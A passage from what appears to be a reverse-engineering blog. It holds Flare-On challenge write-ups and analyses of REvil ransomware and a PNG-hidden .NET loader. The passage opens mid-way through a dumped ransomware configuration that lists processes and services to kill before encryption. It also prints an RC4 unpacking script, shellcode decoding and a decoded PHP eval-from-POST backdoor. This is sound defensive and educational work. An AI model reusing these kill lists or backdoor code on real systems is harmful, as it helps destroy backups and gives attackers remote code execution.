         'ocautoupds',
         'raw_agent_svc',
         'oracle',
         'disk+work',
         'powerpnt',
         'saposcol',
         'sqbcoreservice',
         'sapstartsrv',
         'beserver',
         'saphostexec',
         'dbeng50',
         'isqlplussvc',
         'CVODS',
         'DellSystemDetect',
         'CVMountd',
         'TeamViewer.exe',
         'dbsnmp',
         'thunderbird',
         'mspub',
         'wordpad',
         'visio',
         'benetns',
         'QBCFMonitorService',
         'TeamViewer_Service.exe',
         'tv_w32.exe',
         'QBIDPService',
         'winword',
         'thebat',
         'VeeamDeploymentSvc',
         'avagent',
         'QBDBMgrN',
         'mydesktopqos',
         'xfssvccon',
         'sql',
         'tbirdconfig',
         'CagService',
         'pvlsvr',
         'avscc',
         'VeeamNFSSvc',
         'onenote',
         'excel',
         'msaccess',
         'agntsvc'],
 'spsize': 1,
 'sub': '58',
 'svc': ['QBCFMonitorService',
         'thebat',
         'dbeng50',
         'winword',
         'dbsnmp',
         'VeeamTransportSvc',
         'disk+work',
         'TeamViewer_Service.exe',
         'firefox',
         'QBIDPService',
         'steam',
         'onenote',
         'CVMountd',
         'cvd',
         'VeeamDeploymentSvc',
         'VeeamNFSSvc',
         'bedbh',
         'mydesktopqos',
         'avscc',
         'infopath',
         'cvfwd',
         'excel',
         'beserver',
         'powerpnt',
         'mspub',
         'synctime',
         'QBDBMgrN',
         'tv_w32.exe',
         'EnterpriseClient',
         'msaccess',
         'ocssd',
         'mydesktopservice',
         'sqbcoreservice',
         'CVODS',
         'DellSystemDetect',
         'oracle',
         'ocautoupds',
         'wordpad',
         'visio',
         'SAP',
         'bengien',
         'TeamViewer.exe',
         'agntsvc',
         'CagService',
         'avagent',
         'ocomm',
         'outlook',
         'saposcol',
         'xfssvccon',
         'isqlplussvc',
         'pvlsvr',
         'sql',
         'tbirdconfig',
         'vxmon',
         'benetns',
         'tv_x64.exe',
         'encsvc',
         'sapstartsrv',
         'vsnapvss',
         'raw_agent_svc',
         'thunderbird',
         'saphostexec'],
 'wfld': ['backup', 'bkp', 'archive'],
 'wht': {'ext': ['dll',
                 'scr',
                 'icns',
                 'ics',
                 'nomedia',
                 'sys',
                 'ps1',
                 'hlp',
                 'lock',
                 'spl',
                 'msi',
                 'mpa',
                 'wpx',
                 'ocx',
                 'drv',
                 'msp',
                 'cmd',
                 'rtp',
                 'key',
                 'deskthemepack',
                 'bat',
                 'ico',
                 'mod',
                 'prf',
                 'diagcfg',
                 'cpl',
                 'adv',
                 'hta',
                 'ani',
                 '386',
                 'bin',
                 'diagcab',
                 'msu',
                 'rom',
                 'diagpkg',
                 'shs',
                 'themepack',
                 'theme',
                 'com',
                 'cab',
                 'msc',
                 'icl',
                 'exe',
                 'idx',
                 'nls',
                 'lnk',
                 'msstyles',
                 'cur'],
         'fld': ['program files',
                 'mozilla',
                 'google',
                 'tor browser',
                 'program files (x86)',
                 'boot',
                 'system volume information',
                 'intel',
                 'msocache',
                 'programdata',
                 'application data',
                 'windows.old',
                 '$windows.~ws',
                 '$windows.~bt',
                 'appdata',
                 'perflogs',
                 '$recycle.bin'],
         'fls': ['ntuser.ini',
                 'autorun.inf',
                 'ntldr',
                 'iconcache.db',
                 'ntuser.dat',
                 'boot.ini',
                 'bootsect.bak',
                 'desktop.ini',
                 'ntuser.dat.log',
                 'bootfont.bin',
                 'thumbs.db']},
 'wipe': True}

Flare-on 2 - Challenge 3

locutus@the-collective.net (Ben Mason) — Tue, 23 Feb 2021 09:05:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

In the third challenge, you are greeted with a nice goat named Elfie that when you are typing characters show up on the screen. As always I start off by checking out what kind of binary I am looking at

λ file elfie
elfie: PE32 executable (console) Intel 80386, for MS Windows

As I said we are greeted by thie goat that eats magic keys

After doing some initial analysis in Ghidra found some strings that indicate that this file might be a python executable.

Additionally, the icon embedded in the binary should have been a giveaway. I guessed it was probably a pyInstaller executable. I ran it through pyinstextractor.py to expand it out and get a copy of the python source to analyze.

C:\Users\IEUser\Desktop
λ pyinstxtractor.py elfie.exe
C:\Tools\pyinstxtractor\pyinstxtractor.py:86: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
[*] Processing elfie.exe
[*] Pyinstaller version: 2.1+
[*] Python version: 27
[*] Length of package: 12034944 bytes
[*] Found 26 files in CArchive
[*] Beginning extraction...please standby
[!] Warning: The script is running in a different python version than the one used to build the executable
    Run this script in Python27 to prevent extraction errors(if any) during unmarshalling
[*] Found 244 files in PYZ archive
[+] Possible entry point: _pyi_bootstrap
[+] Possible entry point: pyi_carchive
[+] Possible entry point: elfie
[*] Successfully extracted pyinstaller archive: elfie.exe

You can now use a python decompiler on the pyc files within the extracted directory

C:\Users\IEUser\Desktop

I found the file elfie and opened it in VSCode to look at the contents.

it looks to be full of Base64 strings that are concatenated together, decoded, and executed.

I changed the final operation to print the encoded python code for further analysis.

The next layer down looked more like normal python code with obfuscated variable names.

Even looking at the obfuscated code the is pretty obvious but I wanted to clean up some of the variable names to make sure I was not missing anything else.

After reversing the string the flag is revealed

and Elfie is happy!

Reversing Revil Malware - Part 1 - Stage 1 Unpacker

locutus@the-collective.net (Ben Mason) — Wed, 17 Feb 2021 09:00:00 -0500

This is the first in a series looking at part of the REvil malware. I will start off by showing a brief triage overview of the sample and then dive into the initial details of the stage 1 unpacker. Let us get into it!

Initial Triage

The Revil (aka Sodinokibi) malware is ransomware that encrypts files on a victim’s disk and leaves a note to head to a Tor link to send payment to decrypt your files. The sample I am analyzing has the following has the hash.

λ sha256sum.exe revil.bin
329983dc2a23bd951b24780947cb9a6ae3fb80d5ef546e8538dfd9459b176483 *revil.bin

Uploading the sample to Virustotal showed that it was detected as malicious by the majority of antivirus engines.

VirusTotal
I ran the sample using the sandbox Any.Run, and during the run, you can see it encrypt the files and change the background to instruct the user to look at the ransom note.

ANY.RUN task

After the quick triage showing what this sample does to the victim’s computer, we will start to dive deeper into various aspects of how this sample operates, starting with the initial unpacking.

Unpacking

The Revil malware has two stages, the first stage contains an RC4 encrypted second-stage payload that is unpacked into memory. The second stage payload executes the ransomware functions encrypting files on disk. This executable follows a few steps where the second stage data is decrypted, placed into memory, and then executed.

The main function reflects this flow, looking at the marked-up IDA de-compiler screenshot. You can see the RC4 key copied into a memory buffer used to set up the RC4 KSA.

The resulting S array is passed into the decryption payload function.

The decryption loop pulls data from a pointer I named PAYLOAD_DATA that points to the start of the .enc section of the binary file. The data is decrypted and written back into the .enc section.

To simplify second stage extraction for further analysis, I have written a simple python script to extract the payload, decrypting it, and writing the second stage content to disk.

import pefile
import ARC4

pe = pefile.PE(firststage)

key = "kZlXjn3o373483wb6ne1LIBNWD3KWBEK"

section_name = "enc"

for section in pe.sections:
    if bytes(section_name, 'utf-8') in section.Name:
        section_data = section.get_data()
        
cipher = ARC4(key)
dump = cipher.decrypt(section_data)   

print (dump[:20])

f = open("stage2.bin", "wb")
f.write(bytearray(dump))
f.close()

After this data is decrypted, it is loaded into memory using Windows Native API calls. First, it allocates a memory space using NtAllocateVirtualMemory and then writes the decrypted data to the newly allocated memory location.

It then dynamically resolves some Imports and executes the second stage code by calling into ecx, which points to the new memory region.

Close out

Now the second stage is unpacked and running! In the next post in this series, we will cover how to extract the configuration and parse the configuration data.

Flare-on 2 - Challenge 2

locutus@the-collective.net (Ben Mason) — Tue, 16 Feb 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

The second challenge from this season built on the first challenge. It was another password entry challenge but with a more complicated password encoding scheme.

First things first I validated what kind of file I was looking at.

λ file very_succes
very_succes: PE32 executable (console) Intel 80386, for MS Windows

When running the file I entered some test data to see how it looked to a user.

I switched back to Ghidra to do some static analysis on this binary and found the area of code that looked to handle the password comparison. The first check that jumped out to me was the length check that checked to see if the password was 37 characters long.

Then I found the encoding and matching bulk of the code which I have commented below. This block of code uses a combination of XOR and Bit-wise shifting of the characters to encode each character of the input to match it against the encoded password.

It took me a little bit to see that the SCASB instruction at 0x4010c8 is used to set the zero flag to 1 if the encoded value does not match and jump to a failure condition. Otherwise is set to 0 for success and continues the loop.

I ran the binary using x64dbg to walk through and monitor execution manually setting the Zero Flag to check how the algorithm operated. I also identified the location of the encoded key stored in EDI and copied out that data in hex.

AFAAADEB AEAAECA4 BAAFAEAA 8AC0A7B0 BC9ABAA5 A5BAAFB8 9DB8F9AE 9DABB4BC B6B3909A A8

As with the first challenge in this season I crudely implemented the encoder in python and using brute force was able to successfully generate the key.

Decoder code

encoded = [0xAF, 0xAA, 0xAD, 0xEB, 0xAE, 0xAA, 0xEC, 0xA4, 0xBA, 0xAF, 0xAE, 0xAA, 0x8A, 0xC0, 0xA7, 0xB0, 0xBC, 0x9A, 0xBA, 0xA5, 0xA5, 0xBA, 0xAF, 0xB8, 0x9D, 0xB8, 0xF9, 0xAE, 0x9D, 0xAB, 0xB4, 0xBC, 0xB6, 0xB3, 0x90, 0x9A, 0xA8]

result_key = ""
    
def xchg(s1, s2):
    temp = s1
    s1 = s2
    s2 = temp
    
    return s1, s2

def decoder(text_data):
    global result_key
   
    success_count = 0
    
    bx = 0
    dx = 0
    key_store = 0 # stack
    cl = 37
    eax = 0x1901c7

    for i in text_data:
        dx = bx
        dx = dx & 0x3
        ah = (eax & 0x0000FF00 > 1)
        al = (eax & 0x000000FF)

        dl = (dx & 0x00FF)
        al = (i ^ al)
        dl, cl = xchg(dl, cl)
        ah, cf = ah << cl, ah & 1
        al = al + ah + cf
        ax = al + (ah*0x100)
        dl, cl = xchg(dl, cl)

        dx = 0
        dl = 0
        ax = ax & 0xff
        output = ax
        bx = bx + (ax & 0xff)

        cl = cl - 0x1
        if encoded[cl] != output:
            pass
        else:
            result_key += chr(i)
            success_count += 1
            
    return success_count

test = [65] * 37

for element in range(len(test)):            
    for i in range(0x21,0x7e):
        test[element] = i

        succ_coun = decoder(test)
        if succ_coun < element+1:
            pass
            result_key = ""

        else:
            print (succ_coun, element, chr(i))
            print("Key:", result_key)
            break
            
print (test)
print ("resultkey: \"" + result_key + "\"")

Flare-on 2 - Challenge 1

locutus@the-collective.net (Ben Mason) — Tue, 09 Feb 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

The first challenge in the 2015 season on Flare On was a pretty easy enter the password type of challenge. I started off by opening the extracted file in IDA and running it in the debugger. I stepped to the section of code that evaluates the input versus the input

I extracted the encoded key from memory

Then I re-implemented the XOR encryption in python and generated the key from the data.

Which successfully worked!

Flare-on 1 - Challenge 5 - 5get_it

locutus@the-collective.net (Ben Mason) — Tue, 02 Feb 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

Challenge 5 brings us a DLL file, I mainly used Ghidra to statically analyze this file.

5get_it: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

After Ghidra loaded and analyzed the file, I found this function at 0x1000a680 that does a few things, first to Reads and writes the Run key to setup persistence for this DLL file, and it also copies itself to the C:\windows\system32 directory as svchost.dll to look like a legitimate DLL file. Next, it executes a function that looks to act as a key logger.

This function sets up a buffer to store keystrokes into them write them out to a file named svchost.log. Looking at the mw_key_press_handler function we see how it handles the key presses.

This function has various handler function for each ASCII value for most upper case letters, lower case letter, number, and some other characters. However not all have handler functions, so I took a closer look at the functions.

Below are three examples of functions, some of the functions would set a global variable to 1 or 0 depending on if another variable was set, and/or call another function that sets a group of global variables to 0. Not all of the functions returned the same letter that was pressed. As shown below “`” returns the number “0”.

Taking a closer look at the global variables that are manipulated I could see a pattern of them being written or read depending on the keypress handler functions.

Went through the listing of functions and created a list of the key presses and the return values and saw what looks like the key.

Memory Address	Input Char	Output Char
DAT_10019460	L	l
DAT_10019464	`	0
DAT_10019468	G	g
DAT_1001946c	G	g
DAT_10019470	I	i
DAT_10019474	N	n
DAT_10019478	G	g
DAT_1001947c	D	d
DAT_10019480	O	o
DAT_10019484	T	t
DAT_10019488	U	u
DAT_1001948c	R	r
DAT_10019490	D	d
DAT_10019494	O	o
DAT_10019498	T	t
DAT_1001949c	e	5
DAT_100194a0	T	t
DAT_100194a4	R	r
DAT_100194a8	O	0
DAT_100194ac	K	k
DAT_100194b0	E	e
DAT_100194b4	`	5
DAT_100194b8	A	a
DAT_100194bc	T	t
DAT_100194c0	F	f
DAT_100194c4	L	l
DAT_100194c8	A	a
DAT_100194cc	R	r
DAT_100194d0	E	e
DAT_100194d4	D	d
DAT_100194d8	A	a
DAT_100194dc	S	s
DAT_100194e0	H	h
DAT_100194e4	O	o
DAT_100194e8	N	n
DAT_100194ec	D	d
DAT_100194f0	O	o
DAT_100194f4	T	t
DAT_100194f8	C	c
DAT_100194fc	O	o

But this table does not include the letter “m” at the end of “com” the handler for “M” has an extra function that it calls.

This function that the handler calls has a large number of local variables and makes Ghidra very sad, but its main function shows a message box with the flag: l0gging.ur.5trok5@flare-on.com

Flare-on 1 - Challenge 4 - Sploitastic

locutus@the-collective.net (Ben Mason) — Thu, 28 Jan 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

We start off with a PDF file in Challenge 4, I start off by dumping the contents of the streams using pdf-parser from Didier Stevens PDF-tools

pdf-parser.py -f APT9001.orig.pdf > apt5.txt

Looking through the content I find a block of Javascript code that looks interesting

After copying it out and some manual de-obfuscation I find a block of what looks to be hex-encoded shellcode. I grabbed a script to decode it into a binary file to run and debug.

from binascii import unhexlify as unhx

#encoded = open('encoded.txt').read() # The shellcode dump
out = open('shellcode.bin', 'wb')

encoded ="%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u-SNIP-%u2454%u5740%ud0ff"

for s in encoded.split('%'):
    if len(s) == 5:
        HI_BYTE = s[3:]
        LO_BYTE = s[1:3]
        out.write(unhx(HI_BYTE))
        out.write(unhx(LO_BYTE))
out.close()

I took the binary code and loaded it in BlobRunner and attached x64dbg to it.

The first instruction sets the carry flag to 1, the following instruction JMPs to end the code if the CF flag is set, the JB instruction needs to be patched to a NOP or the CF set to 0 to keep running the code.

The code can be walked through until it loads the flag into the stack around offsec of +0x3c1 and it shows up in the register of ECX.

However, if you run the code until completion it shows up as junk in the message box that is displayed.

To get the flag to show up in the message box you need to NOP the look starting at +0x3ce before the CALL to EAX.

Now the flag shows up in the message box!

Flare-on 1 – Challenge 3 - Shellolololol

locutus@the-collective.net (Ben Mason) — Tue, 26 Jan 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

Challenge 3 brings a PE executable file to take a look at.

such_evil: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

I loaded the file up in x64dbg and after navigating to the main function it looks to load a whole lot of data onto the stack then CALL into the loaded code.

I continued to step through the program monitoring and watching the memory region pointed to be ESI.

The shell code (not pictured) is decoded and over written in multiple stages leaving these messages at ESI

Finally revealing the flag

There are more elaborate ways to reveal the flag, the official write up uses IDAPython scripting to manually decode the messages.

Flare-on 1 – Challenge 2 - Javascrap

locutus@the-collective.net (Ben Mason) — Thu, 21 Jan 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

In Challenge 2 the zip file extracts a html and png file.

From the top of the HTML file to looks pretty normal until you see the PHP tag located near the bottom of the code including the PNG file in the img directory.

The file looks to be a normal PNG file and displays image data when loaded.

At the end of the file, you find some PHP code. I copied out the PHP code and translated it to some python code, it looks to be a decoding routine to generate a payload.

terms=["M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|"]
order=[59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47]
do_me=""

for i in range(len(order)):
    do_me+=terms[order[i]]

print (do_me)

This generated payload looks to contain a few base64 encoded strings.

$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9';$__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7';$___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

I created the following code to decode the strings

import base64

print('$_ is', base64.b64decode('aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9'))
print()
print('$__ is', base64.b64decode('JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7'))

This code extracts some POST payloads that look to be hex and decimal ASCII codes.

1
2
3

$_ is b'if(isset($_POST["\\97\\49\\49\\68\\x4F\\84\\116\\x68\\97\\x74\\x44\\x4F\\x54\\x6A\\97\\x76\\x61\\x35\\x63\\x72\\97\\x70\\x41\\84\\x66\\x6C\\97\\x72\\x65\\x44\\65\\x53\\72\\111\\110\\68\\79\\84\\99\\x6F\\x6D"])) { eval(base64_decode($_POST["\\97\\49\\x31\\68\\x4F\\x54\\116\\104\\x61\\116\\x44\\79\\x54\\106\\97\\118\\97\\53\\x63\\114\\x61\\x70\\65\\84\\102\\x6C\\x61\\114\\101\\x44\\65\\x53\\72\\111\\x6E\\x44\\x4F\\84\\99\\x6F\\x6D"])); }'

$__ is b'$code=base64_decode($_);eval($code);'

Once more to convert these values to characters we find the flag.

print("_POST = ", end="")
string2=[97, 49, 49, 68, 0x4F, 84, 116, 0x68, 97, 0x74, 0x44, 0x4F, 0x54, 0x6A, 97, 0x76, 0x61, 0x35, 0x63, 0x72, 97, 0x70, 0x41, 84, 0x66, 0x6C, 97, 0x72, 0x65, 0x44, 65, 0x53, 72, 111, 110, 68, 79, 84, 99, 0x6F, 0x6D]

for i in string2:
    print(chr(i), end="")

`1`	`_POST = a11DOTthatDOTjava5crapATflareDASHonDOTcom`

Flare-on 1 - Challenge 1 - Bob Doge

locutus@the-collective.net (Ben Mason) — Mon, 18 Jan 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

In the very first challenge you are presented with a windows executable and when you run it you are presented with a Bob Ross painting a nice scene.

But, when you click DECODE! You get a Bob Doge with an weird text string.

Digging a little deeper to see what type of file we have we find we hace a .NET executable.

$ file Challenge1.exe                                                   
Challenge1.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

I next loaded the file up in dnSpy and after navigating from the entry point into Form1. I found the following code block.

The function “btnDecode_Click()” looks very interesting, when stepping into it I find what looks to be a decoding algorithm that pulls its content from the Resources. I set a few breakpoints on the code just after the loops.

After running to the breakpoint after the first loop the flag is in clear text in the “text” variable. The next few loops re-encode the flag to return an obscured output shown in the UI.

Decoding Malware Payload encoded in a PNG part 2 - "W.H.O.bat"

locutus@the-collective.net (Ben Mason) — Wed, 10 Jun 2020 09:00:00 -0400

This post is a sequel to the post covering the sample “Bank Statement.bat.” I had received this message before the Bank Statement message, but I found the sample in the previous post was less obfuscated and easier to reverse engineer.

In this post, I will cover the different ways that this sample hid the decoding routes and how I was able to gather the data to run the same decoding script I used before to extract the payload from the PNG data within this sample.

Detailed Analysis

The metadata between the two samples is different but still tries to represent this .NET compiled binary is from “Apple Inc.” In this dump below, you see that this sample attempts to represent itself as an iTunes Visualizer.

Architecture:     IMAGE_FILE_MACHINE_I386
Subsystem:        IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 2020-Apr-16 11:34:55
Comments:         iTunes Visualizer Host
CompanyName:      Apple Inc.
FileDescription:  iTunes Visualizer Host
FileVersion:      4.4.3.0
InternalName:     Vi8BESIfUtQA5qX.exe
LegalCopyright:   © 2000-2020 Apple Inc. All rights reserved.
OriginalFilename: Vi8BESIfUtQA5qX.exe
ProductName:      iTunes Visualizer Host
ProductVersion:   4.4.3.0
Assembly Version: 1.4.0.0

Matching compiler(s):
    Microsoft Visual C# v7.0 / Basic .NET
    .NET executable -> Microsoft

As with the previous sample there is an PNG file embedded in the binary. however the images is 20 pixels larger in each dimension.

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Microsoft executable, portable (PE)
26921         0x6929          PNG image, 300 x 300, 8-bit/color RGBA, non-interlaced
26999         0x6977          Zlib compressed data, compressed
404804        0x62D44         Copyright string: "CopyrightAttribute"

Visually looking at the PNG data, it looks similar to the PNG data from the Bank Account.bat sample. Seeing this, I started to think I may be able to use the same method I used previously to decode the payload. As a first attempt, I ran the script as-is, and as I expected, it didn’t correctly decode the file. I was already assuming at least that this sample would use a different key.

I started to look at the sample in dnSpy to find the key and the decoding methods in this binary. The first thing I noticed is that this .NET file either had more obfuscation or was just obfuscated differently than the previous binary I investigated. I was able to follow the flow from the entry point to where the sample starts a new process. There is not whole lot else interesting in the code after this point in the method.

After running the sample using the dnSpy debugger to decode the arguments of the Process.Start method call; I found that the sample executes “installUtil.exe” a .NET utility with the /u and the path to the location of the sample.

Pulling up the documentation for installUtil.exe utility I found the following:

“Installutil.exe uses reflection to inspect the specified assemblies and to find all Installer types that have the System.ComponentModel.RunInstallerAttribute attribute set to true. The tool then executes either the Installer.Install or the Installer.Uninstall method on each instance of the Installer type. Installutil.exe performs installation in a transactional manner; that is, if one of the assemblies fails to install, it rolls back the installations of all other assemblies. Uninstall is not transactional.”

https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool

Note: I ran de4dot in between to make life a little easier to parse. It did not note any specific obfuscators.

In short, the /u installUtil.exe option runs the Uninstall method of the binary in the argument, in this case, the sample we are investigating. I searched the sample’s code for “Install” and found the following Uninstall method. This method looks very similar to the method that executed the PNG parsing function on the Bank Account.bat malware. For example, this method has similarly named variables and a similar flow to the PNG decoding method in the other sample.

When attempting to extract the data from the variables and reverse the methods, I found that smethod_0 and other related methods are heavily obfuscated and very hard to analyze statically. I switched to dynamic analysis and executed this sample in dnSpy. I used the following options to run in it using installUtil.exe and set a breakpoint in the Uninstall method.

After running the code, I hit the breakpoint I expected in the Uninstall function. Then I stepped over the “text” and “location” variables having their values assigned, revealing the PNG resources and the password in a similar format to the “Bank Account.bat” sample. Unfortunately, the process crashes when attempting to extract the code that is used to unpack the PNG. This crash is not an issue; I was able to retrieve the data I needed.

After only changing the extracted PNG file, XOR key, and final PNG pixel data value in the script I created for “Bank Statement.bat” Success, I was able to extract the payload.

The extracted payload looks to be very similar to the Bank Statement.bat payload. They both have the same filename in the metadata “ReZer0V2.exe.” However, some of the metadata is different, indicating they may be different versions of the payload.

Wrap up

My hunch was correct about these samples using the same encoding method for the PNG payload. I still have not reversed the payload yet, but there are some links to other work on this payload in my other post for the Bank Statement.bat sample. I enjoyed working on this sample, the different methods used to hide the decoding routine of the PNG data were a fun challenge.

Sample Download

https://malshare.com/sample.php?action=detail&hash=ad9462489dfac401daf38efb2b5acbbf

IOCs

MD5: ad9462489dfac401daf38efb2b5acbbf
SHA1: ee1b10bf9523d89586f5ba6bf2d44ed0dce5c13a
SHA256: e161ec8af4ae4b055ca4cd2f405c041f643894f403f35bc3cbc25064328682ef

Full Decode Script

import png
import struct

def print_list(thelist, quantity):

	if (quantity == 0):
		quantity = len(thelist)

	#print ("Decimal: ", end="")
	#for i in range(0, quantity):
	#	print (thelist[i], ", ", end="")
	#print ("")
	print ("Hex: ", end="")
	for i in range(0, quantity):
		print (hex(thelist[i]), ", ", end="")
	print ("")
	print ("ASCII: ", end="")
	for i in range(0, quantity):
		print (chr(thelist[i]), ", ", end="")
	print ("")

############

filename = "be8ff-2.bmp"
# 0x0 , 0x58 , 0x0 , 0x41 , 0x0 , 0x64 , 0x0 , 0x67 , 0x0 , 0x57 , 0x0 , 0x6b , 0x0 , 0x4b
plain_key = "EMe2A6he"
key = bytearray(plain_key.encode("utf-16be"))
print_len = 50
print ("Key: ")
print_list(key, 0)
print ("Key len: ", len(key))

##
#### Load PNG
bmp_full_data = png.Reader(filename=filename).read()
bmp_img_data = list(bmp_full_data[2])

##
#### Reverse Start
data_array = []
output_array = []

print ("")
print ("Loading Image data")
print ("IMG height: ", len(bmp_img_data))
row_count = 0
